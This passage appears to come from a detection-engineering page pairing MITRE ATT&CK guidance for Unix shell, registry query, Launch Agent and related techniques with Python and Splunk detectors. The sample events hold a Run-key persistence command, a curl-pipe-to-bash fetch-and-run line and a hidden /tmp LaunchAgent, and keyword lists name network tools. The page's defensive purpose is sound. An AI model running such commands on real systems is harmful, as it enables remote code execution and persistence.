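    Proc("g-cmd-macro", "g-winword", r"C:\Windows\System32\cmd.exe",
         r'cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\alice\AppData\Roaming\upd.exe',
         r"CORP\alice"),
    Proc("g-reg-macro", "g-cmd-macro", r"C:\Windows\System32\reg.exe",
         r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\alice\AppData\Roaming\upd.exe',
         r"CORP\alice"),
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, so WINWORD.EXE and winword.exe compare equal."""
    return image.rsplit("\\", 1)[-1].lower()


def build_index(events: list[Proc]) -> dict[str, Proc]:
    """Index events by ProcessGuid; the GUID is unique per process, unlike the PID."""
    return {p.guid: p for p in events}


def ancestry(index: dict[str, Proc], guid: str, max_depth: int = 8) -> list[Proc]:
    """Walk ParentProcessGuid upward; stops at the first parent absent from telemetry."""
    chain: list[Proc] = []
    seen: set[str] = set()
    while guid in index and guid not in seen and len(chain) < max_depth:
        seen.add(guid)
        chain.append(index[guid])
        guid = index[guid].parent_guid
    return chain


def find_reg_from_shell(events: list[Proc]) -> list[dict]:
    """reg.exe whose parent is cmd.exe and whose grandparent is known and is not explorer.exe."""
    index = build_index(events)
    hits = []
    for p in events:
        if basename(p.image) != "reg.exe":
            continue
        chain = ancestry(index, p.guid)
        if len(chain) < 3 or basename(chain[1].image) != "cmd.exe":
            continue                       # no cmd.exe parent, or grandparent not in telemetry
        if basename(chain[2].image) == "explorer.exe":
            continue                       # interactive user at a shell; tune, do not alert
        hits.append({
            "guid": p.guid,
            "user": p.user,
            "chain": [basename(c.image) for c in chain],   # reg.exe first, oldest ancestor last
            "touches_run_key": bool(RUN_KEY.search(p.command_line)),
            "command_line": p.command_line,
        })
    return hits


if __name__ == "__main__":
    for hit in find_reg_from_shell(EVENTS):
        print(" <- ".join(hit["chain"]), "| run key:", hit["touches_run_key"])
        print("   ", hit["command_line"])
```

The `touches_run_key` flag is the piece the join alone does not give you: a reg.exe that both came from a non-interactive shell and wrote a Run/RunOnce value is the case worth paging on, while the rest of the hits go into a tuning queue for the background scripts the entry above says must be learned.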
T1059.004 - Unix Shell
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may abuse Unix shell commands and scripts for execution. Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Note: this analytic does not include an exhaustive list of potentially suspicious commands that could be executed through a shell interpreter. Instead, it is meant to serve as an example of the types of commands that can warrant further investigation. Analytic 1 - Unusual command execution: sourcetype="linux_logs" CommandLine="sh -c" AND (CommandLine="wget" OR CommandLine="curl" OR CommandLine="nc" OR CommandLine="perl") | |||
Monitor for newly executed processes that may abuse Unix shell commands and scripts for execution. Analytic 1 - Look for unusual Unix shell process creation: sourcetype=linux_secure OR sourcetype=macos_secure | search (command="sh" OR command="bash" OR command="zsh") | eval suspicious_process=if(like(command_line, "%.sh") OR like(command_line, "%.bash") OR like(command_line, "%.zsh"), "Yes", "No") | where suspicious_process="Yes" |
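The two Unix shell analytics above are written as Splunk searches. As an added example that is not part of the original guidance, the same logic is expressed below in Python over a handful of constructed process-creation records, so it can be run against an EDR or auditd export offline: it flags inline "sh -c" scripts that call the download/network tools named in Analytic 1, and shell scripts launched from staging directories or with dotfile names. The record field names and the staging directory list are assumptions.

```python
import re
import shlex

# Constructed sample process-creation records (not from the page); the field
# names mimic what an EDR or auditd forwarder might emit and are assumptions.
SAMPLE_EVENTS = [
    {"pid": 4311, "ppid": 4001, "image": "/bin/sh",
     "command_line": "sh -c 'curl -s http://203.0.113.10/x | bash'"},
    {"pid": 4312, "ppid": 610, "image": "/bin/zsh",
     "command_line": "zsh /Users/dev/build.sh"},
    {"pid": 4313, "ppid": 4002, "image": "/bin/bash",
     "command_line": "bash /tmp/.update.sh"},
    {"pid": 4314, "ppid": 1, "image": "/usr/bin/perl",
     "command_line": "perl -e 'print 1'"},
]

SHELLS = {"sh", "bash", "zsh"}
# Tools named in the page's Analytic 1 for "sh -c" style execution.
SUSPICIOUS_TOOLS = {"wget", "curl", "nc", "perl"}
# Staging locations commonly used to drop scripts (assumed list; tune locally).
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/Users/Shared/", "/var/tmp/")

def classify(event):
    """Return a list of reasons an event is suspicious (empty if none)."""
    reasons = []
    try:
        argv = shlex.split(event["command_line"])
    except ValueError:
        return ["unparseable command line"]
    if not argv or argv[0].rsplit("/", 1)[-1] not in SHELLS:
        return reasons  # Not a shell interpreter; out of scope here.
    # sh -c "<script>": look inside the inline script for download/network tools.
    if len(argv) >= 3 and argv[1] == "-c":
        words = set(re.findall(r"[A-Za-z0-9_./-]+", argv[2]))
        hits = sorted(w for w in words if w.rsplit("/", 1)[-1] in SUSPICIOUS_TOOLS)
        if hits:
            reasons.append("inline shell invokes " + ",".join(hits))
    # Script files run by a shell: flag staging dirs or hidden (dotfile) names.
    for arg in argv[1:]:
        if arg.endswith((".sh", ".bash", ".zsh")):
            if arg.startswith(SUSPICIOUS_DIRS):
                reasons.append("script executed from staging dir " + arg)
            if arg.rsplit("/", 1)[-1].startswith("."):
                reasons.append("hidden script name " + arg)
    return reasons

def scan(events):
    """Map pid -> reasons for every event that produced at least one reason."""
    return {e["pid"]: r for e in events if (r := classify(e))}
```

Running scan(SAMPLE_EVENTS) reports pids 4311 and 4313 only; the developer's build script and the bare perl invocation are left alone, which is the tuning the guidance asks for.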
T1012 - Query Registry
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software. Note: For PowerShell Module logging event id 4103, enable logging for the module Microsoft.PowerShell.Management. The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such as a registry key (PSProvider "Registry"). The Get-ChildItem cmdlet gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations. Analytic 1 - Suspicious Commands: (sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" EventCode="4103") | WHERE CommandLine LIKE "%New-PSDrive%" AND (CommandLine LIKE "%Registry%" OR CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%") | |||
Monitor for API calls (such as RegOpenKeyExA) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. OS API calls associated with querying the Windows Registry are RegOpenKeyEx, RegOpenUserClassesRoot, RegQueryValueExA, and RegQueryValueExW. Execution of these functions might trigger security log ids such as 4663 (Microsoft Security Auditing). Also monitor for the RegOpenUserClassesRoot API, which retrieves a handle to the HKEY_CLASSES_ROOT key for a specified user. The returned key has a view of the registry that merges the contents of the HKEY_LOCAL_MACHINE\Software\Classes key with the contents of the Software\Classes keys in the user's registry hive. Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint, but may have alerts or events that are based on abstractions of OS API calls. | |||
Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software. Note: The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such as a registry key (PSProvider "Registry"). The Get-ChildItem cmdlet gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations. Note for Analytic 3: Replace FilePathToLolbasProcessXX.exe with the LOLBAS process names that are used by your organization. The number_standard_deviations parameter should be tuned accordingly. Identifying outliers by comparing the distance from a data point to the average value against a certain number of standard deviations is recommended for data values that are symmetrically distributed. If your data is not symmetrically distributed, try a different algorithm such as the Interquartile Range (IQR). Analytic 1 - Suspicious Processes with Registry keys: (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | search (CommandLine LIKE "%reg%" AND CommandLine LIKE "%query%") OR (CommandLine LIKE "%Registry%" AND (CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%")) Analytic 2 - reg.exe spawned from suspicious cmd.exe: ((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) | WHERE (Image LIKE "%reg.exe%" AND ParentImage LIKE "%cmd.exe%") | rename ProcessParentGuid as guid | join type=inner guid [ | search ((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND (Image LIKE "%cmd.exe%" AND ParentImage NOT LIKE "%explorer.exe%") | rename ProcessGuid as guid ] Analytic 3 - Rare LolBAS command lines: ((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) AND Image IN ('FilePathToLolbasProcess01.exe','FilePathToLolbasProcess02.exe') AND number_standard_deviations = 1.5 | select Image, ProcessCount, AVG(ProcessCount) Over() - STDEV(ProcessCount) Over() * number_standard_deviations AS LowerBound | WHERE ProcessCount < LowerBound | |||
Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information. Note: For Security Auditing event ids 4656 and 4663, a System Access Control List (SACL) that controls the use of specific access rights such as Enumerate sub-keys and Query key value is required for event generation. Depending on the Registry key you are monitoring, the implementation of a new SACL might be required, and depending on the Registry key used for the SACL, the generation of event ids 4656 and 4663 might be noisy. Analytic 1 - Suspicious Registry: (sourcetype="WinEventLog:Security" EventCode IN (4663, 4656)) AND ObjectType="Key" | WHERE ObjectName LIKE "%SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall%" AND (UserAccessList LIKE "%4435%" OR UserAccessList LIKE "%Enumerate sub-keys%" OR UserAccessList LIKE "%4432%" OR UserAccessList LIKE "%Query key value%") AND Image NOT IN ('FilePathToExpectedProcess01.exe','FilePathToExpectedProcess02.exe') |
T1543.001 - Launch Agent
ID | Data Source | Data Component | Detects |
Ensure that any Launch Agent whose ProgramArguments key points to executables located in the /tmp or /shared folders is in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. | |||
Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. | |||
Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications. | |||
Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. | |||
Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence. |
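The Launch Agent checks above (ProgramArguments pointing into /tmp or shared folders, RunAtLoad set to true, new or changed plist files) can be applied directly to plist contents. The following is an added example, not code from the original guidance or from any Banshee analysis: it parses a constructed LaunchAgent plist with the standard-library plistlib module and reports each policy deviation. The plist contents, the Label values and the restricted-directory list are constructed assumptions.

```python
import plistlib
from xml.parsers.expat import ExpatError

# Constructed LaunchAgent plist for illustration (not a real Banshee artifact).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/tmp/.updater</string><string>--silent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed benign agent for comparison: executable inside an app bundle.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/helper</string>
</dict></plist>"""

# Staging locations the guidance calls out (/tmp, shared folders); assumed list.
POLICY_DIRS = ("/tmp/", "/private/tmp/", "/Users/Shared/", "/var/tmp/")

def audit_launch_agent(data: bytes) -> dict:
    """Return the agent's label, resolved executable and a list of findings."""
    try:
        plist = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError) as exc:
        return {"label": None, "program": None, "findings": [f"unparseable plist: {exc}"]}
    args = plist.get("ProgramArguments") or []
    # launchd uses Program if present, otherwise ProgramArguments[0].
    program = plist.get("Program") or (args[0] if args else None)
    findings = []
    if program is None:
        findings.append("no Program or ProgramArguments key")
    else:
        if program.startswith(POLICY_DIRS):
            findings.append(f"executable in policy-restricted dir: {program}")
        if "/." in program:
            findings.append(f"hidden executable path: {program}")
    if plist.get("RunAtLoad") is True:
        findings.append("RunAtLoad is true (runs at every login)")
    if plist.get("KeepAlive"):
        findings.append("KeepAlive set (relaunched if the process exits)")
    return {"label": plist.get("Label"), "program": program, "findings": findings}
```

Pointing the function at each file under ~/Library/LaunchAgents and /Library/LaunchAgents, and re-running it on file-creation or modification events, gives the continuous check the guidance describes.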
T1070.004 - File Deletion
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files. | |||
Monitor for unexpected deletion of files from the system. |
T1518 - Software Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. | |||
Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) | |||
Monitor for contextual data about a firewall and activity around it such as name, policy, or status | |||
Monitor for API calls that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. | |||
Monitor newly executed processes that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. |
T1564.001 - Hidden Files and Directories
ID | Data Source | Data Component | Detects |
Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute. | |||
Monitor the file system and shell commands for files being created with a leading "." | |||
Monitor contextual data about a file, which may include information such as name, content (ex: signature, headers, or data/media), user/owner, and permissions, for indications that files and directories have been set to hidden to evade detection mechanisms. | |||
Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms. |